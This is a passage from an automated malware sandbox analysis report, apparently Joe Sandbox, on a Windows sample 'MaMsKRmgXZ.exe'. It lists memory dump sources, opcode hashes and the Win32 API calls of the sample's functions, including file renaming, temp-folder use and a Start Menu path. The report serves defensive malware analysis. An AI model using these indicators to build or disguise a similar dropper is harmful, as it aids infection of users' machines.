                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Feculae
                                                                                                                                      • API String ID: 123533781-1223762460
                                                                                                                                      • Opcode ID: a1dc9ec723c92e273fb39141de77dbeadb3bb7973032d6efa9664245b2eac94e
                                                                                                                                      • Instruction ID: 364dec1ee03e4b34996bd20462589a1769652030a90c2beac7f749610b7a86d9
                                                                                                                                      • Opcode Fuzzy Hash: a1dc9ec723c92e273fb39141de77dbeadb3bb7973032d6efa9664245b2eac94e
                                                                                                                                      • Instruction Fuzzy Hash: 30511871E00209AFCB00DFE4C988A9D7BB5FF48314F2085AAF515EB2D1DB799941CB54
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402774
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1974802433-0
                                                                                                                                      • Opcode ID: c09b4fc7a6f55baf3cf17a5794734188267127eb7d5610de55786ce7ab9932c1
                                                                                                                                      • Instruction ID: 2655497eb84a062ae037f6c25fa5e5de2408fe63ae01e39025771dd9bbe68540
                                                                                                                                      • Opcode Fuzzy Hash: c09b4fc7a6f55baf3cf17a5794734188267127eb7d5610de55786ce7ab9932c1
                                                                                                                                      • Instruction Fuzzy Hash: 3BF0A0B2644101AAD701EBB49A49AEEB768EB11324F60417BE241F21C1D2BC89459B6E
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404A84
                                                                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404A91
                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404AE0
                                                                                                                                      • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404AF7
                                                                                                                                      • SetWindowLongA.USER32(?,000000FC,00405075), ref: 00404B11
                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404B23
                                                                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404B37
                                                                                                                                      • SendMessageA.USER32(?,00001109,00000002), ref: 00404B4D
                                                                                                                                      • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404B59
                                                                                                                                      • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B69
                                                                                                                                      • DeleteObject.GDI32(00000110), ref: 00404B6E
                                                                                                                                      • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B99
                                                                                                                                      • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404BA5
                                                                                                                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C3F
                                                                                                                                      • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404C6F
                                                                                                                                        • Part of subcall function 0040409D: SendMessageA.USER32(00000028,?,00000001,00403ECD), ref: 004040AB
                                                                                                                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C83
                                                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 00404CB1
                                                                                                                                      • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404CBF
                                                                                                                                      • ShowWindow.USER32(?,00000005), ref: 00404CCF
                                                                                                                                      • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404DCA
                                                                                                                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404E2F
                                                                                                                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404E44
                                                                                                                                      • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404E68
                                                                                                                                      • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E88
                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000), ref: 00404E9D
                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00404EAD
                                                                                                                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404F26
                                                                                                                                      • SendMessageA.USER32(?,00001102,?,?), ref: 00404FCF
                                                                                                                                      • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404FDE
                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404FFE
                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 0040504C
                                                                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 00405057
                                                                                                                                      • ShowWindow.USER32(00000000), ref: 0040505E
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                      • String ID: $M$N
                                                                                                                                      • API String ID: 2564846305-813528018
                                                                                                                                      • Opcode ID: 6c91a6865aeac2cc1bc81da0427ec232e576c845fbda25fe1dd31a6c378936cd
                                                                                                                                      • Instruction ID: 966653e8360bab3e2fc21879108ab338c3bc3285e0cd99f232f5bc98bb3d6c0f
                                                                                                                                      • Opcode Fuzzy Hash: 6c91a6865aeac2cc1bc81da0427ec232e576c845fbda25fe1dd31a6c378936cd
                                                                                                                                      • Instruction Fuzzy Hash: 86025CB0900209AFDB10DF64DC45AAE7BB9FB84314F10813AFA15BA2E0D7799E41DF58
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040425E
                                                                                                                                      • GetDlgItem.USER32(00000000,000003E8), ref: 00404272
                                                                                                                                      • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404290
                                                                                                                                      • GetSysColor.USER32(?), ref: 004042A1
                                                                                                                                      • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004042B0
                                                                                                                                      • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004042BF
                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 004042C2
                                                                                                                                      • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004042D1
                                                                                                                                      • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042E6
                                                                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 00404348
                                                                                                                                      • SendMessageA.USER32(00000000), ref: 0040434B
                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404376
                                                                                                                                      • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004043B6
                                                                                                                                      • LoadCursorA.USER32(00000000,00007F02), ref: 004043C5
                                                                                                                                      • SetCursor.USER32(00000000), ref: 004043CE
                                                                                                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 004043E4
                                                                                                                                      • SetCursor.USER32(00000000), ref: 004043E7
                                                                                                                                      • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404413
                                                                                                                                      • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404427
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                      • String ID: Call$N
                                                                                                                                      • API String ID: 3103080414-3438112850
                                                                                                                                      • Opcode ID: aedf8a6b2f60594d9aa2a20867b53785746c99fe12f07fbfb1ee765dbd043f7e
                                                                                                                                      • Instruction ID: a86fe1b261e308fa50e110e5a31abfd90c360c5de8850f7aae14d0f145b03158
                                                                                                                                      • Opcode Fuzzy Hash: aedf8a6b2f60594d9aa2a20867b53785746c99fe12f07fbfb1ee765dbd043f7e
                                                                                                                                      • Instruction Fuzzy Hash: 1561A0B1A00209BBEB109F61DD45F6A7B69FB84705F008036FB01BA2D1C7B8A951CB99
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                      • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                      • DrawTextA.USER32(00000000,00422F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                      • String ID: F
                                                                                                                                      • API String ID: 941294808-1304234792
                                                                                                                                      • Opcode ID: a5e12e9d17b50a3f423cea0afacbb368398e6ec861f9ad0eaee1311db9104a5d
                                                                                                                                      • Instruction ID: e0713781b635691343a74aeb4589e3ea90c77733c460a74728c978b7faf409cc
                                                                                                                                      • Opcode Fuzzy Hash: a5e12e9d17b50a3f423cea0afacbb368398e6ec861f9ad0eaee1311db9104a5d
                                                                                                                                      • Instruction Fuzzy Hash: A7419C71804249AFCF058FA4CD459BFBFB9FF44310F00812AF561AA2A0C738AA50DFA5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405DDA,?,?), ref: 00405C7A
                                                                                                                                      • GetShortPathNameA.KERNEL32(?,00421A98,00000400), ref: 00405C83
                                                                                                                                        • Part of subcall function 00405AD8: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D33,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE8
                                                                                                                                        • Part of subcall function 00405AD8: lstrlenA.KERNEL32(00000000,?,00000000,00405D33,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B1A
                                                                                                                                      • GetShortPathNameA.KERNEL32(?,00421E98,00000400), ref: 00405CA0
                                                                                                                                      • wsprintfA.USER32 ref: 00405CBE
                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00421E98,C0000000,00000004,00421E98,?,?,?,?,?), ref: 00405CF9
                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405D08
                                                                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D40
                                                                                                                                      • SetFilePointer.KERNEL32(004093B8,00000000,00000000,00000000,00000000,00421698,00000000,-0000000A,004093B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D96
                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00405DA7
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405DAE
                                                                                                                                        • Part of subcall function 00405B73: GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\Users\user\Desktop\MaMsKRmgXZ.exe,80000000,00000003), ref: 00405B77
                                                                                                                                        • Part of subcall function 00405B73: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B99
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                      • String ID: %s=%s$[Rename]
                                                                                                                                      • API String ID: 2171350718-1727408572
                                                                                                                                      • Opcode ID: 442663d250bfdbc290f8e971c6720eb5308fb07ccd41dbdaaacc117d0e8b41e7
                                                                                                                                      • Instruction ID: 6ce2b9c5035192946699426d8eaee961ce023100f281e1c8236941499ee81097
                                                                                                                                      • Opcode Fuzzy Hash: 442663d250bfdbc290f8e971c6720eb5308fb07ccd41dbdaaacc117d0e8b41e7
                                                                                                                                      • Instruction Fuzzy Hash: 19311331605B19ABD6207B659C4CFAB3A6CDF45714F14003BFA01FA2D2E67CA8018EBD
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\MaMsKRmgXZ.exe",751D3410,C:\Users\user\AppData\Local\Temp\,00000000,00403210,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,00000008,0000000A), ref: 0040629C
                                                                                                                                      • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004062A9
                                                                                                                                      • CharNextA.USER32(?,"C:\Users\user\Desktop\MaMsKRmgXZ.exe",751D3410,C:\Users\user\AppData\Local\Temp\,00000000,00403210,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,00000008,0000000A), ref: 004062AE
                                                                                                                                      • CharPrevA.USER32(?,?,751D3410,C:\Users\user\AppData\Local\Temp\,00000000,00403210,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,00000008,0000000A), ref: 004062BE
                                                                                                                                      Strings
                                                                                                                                      • "C:\Users\user\Desktop\MaMsKRmgXZ.exe", xrefs: 00406280
                                                                                                                                      • *?|<>/":, xrefs: 0040628C
                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00406245
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Char$Next$Prev
                                                                                                                                      • String ID: "C:\Users\user\Desktop\MaMsKRmgXZ.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                      • API String ID: 589700163-4111895690
                                                                                                                                      • Opcode ID: 6ae2be844214803d006e8a2b4c6c3a53132e84b4cb1e19317121ab57d6ea06c4
                                                                                                                                      • Instruction ID: 98a55a52ac5494643caf5fd5857683424a9a77f1076ac2e6562e20d377716777
                                                                                                                                      • Opcode Fuzzy Hash: 6ae2be844214803d006e8a2b4c6c3a53132e84b4cb1e19317121ab57d6ea06c4
                                                                                                                                      • Instruction Fuzzy Hash: EE11E25180879029EB3226344C40B7B7F988F5B760F2904FFE9D6722C2D67C5C52876E
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetWindowLongA.USER32(?,000000EB), ref: 004040EC
                                                                                                                                      • GetSysColor.USER32(00000000), ref: 0040412A
                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00404136
                                                                                                                                      • SetBkMode.GDI32(?,?), ref: 00404142
                                                                                                                                      • GetSysColor.USER32(?), ref: 00404155
                                                                                                                                      • SetBkColor.GDI32(?,?), ref: 00404165
                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040417F
                                                                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00404189
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2320649405-0
                                                                                                                                      • Opcode ID: 85c1166dd3296ad08f2f8f2b617086cce748397ee5d912704cef396037712cfd
                                                                                                                                      • Instruction ID: 778babcb3f3cb4702814cedc7f3687c69535c8aec6342fb1ab2b401637f1774e
                                                                                                                                      • Opcode Fuzzy Hash: 85c1166dd3296ad08f2f8f2b617086cce748397ee5d912704cef396037712cfd
                                                                                                                                      • Instruction Fuzzy Hash: 8A21C7715047049BC7309F78DC4CB5BBBF8AF91710B048A2AEA96A62E0D334E884CB55
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 6EC01215: GlobalAlloc.KERNEL32(00000040,6EC01233,?,6EC012CF,-6EC0404B,6EC011AB,-000000A0), ref: 6EC0121D
                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 6EC025DE
                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6EC02618
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9908323213.000000006EC01000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EC00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9908269121.000000006EC00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9908365679.000000006EC03000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9908406672.000000006EC05000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6ec00000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Global$Free$Alloc
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1780285237-0
                                                                                                                                      • Opcode ID: 862558c7285974d1b6fc66ca83dbea5d208b95b96f23ea16748873321a5753b0
                                                                                                                                      • Instruction ID: b4d0ddf96fbb7f047de9ed95e810fd8caf6a30ced834ef23d6ea6c385a2c3ac9
                                                                                                                                      • Opcode Fuzzy Hash: 862558c7285974d1b6fc66ca83dbea5d208b95b96f23ea16748873321a5753b0
                                                                                                                                      • Instruction Fuzzy Hash: A241C071108601EFDB098F99CDA8C6BB7BEFB86308B11492DF61197211F7339A05CB65
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004049D6
                                                                                                                                      • GetMessagePos.USER32 ref: 004049DE
                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 004049F8
                                                                                                                                      • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404A0A
                                                                                                                                      • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404A30
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
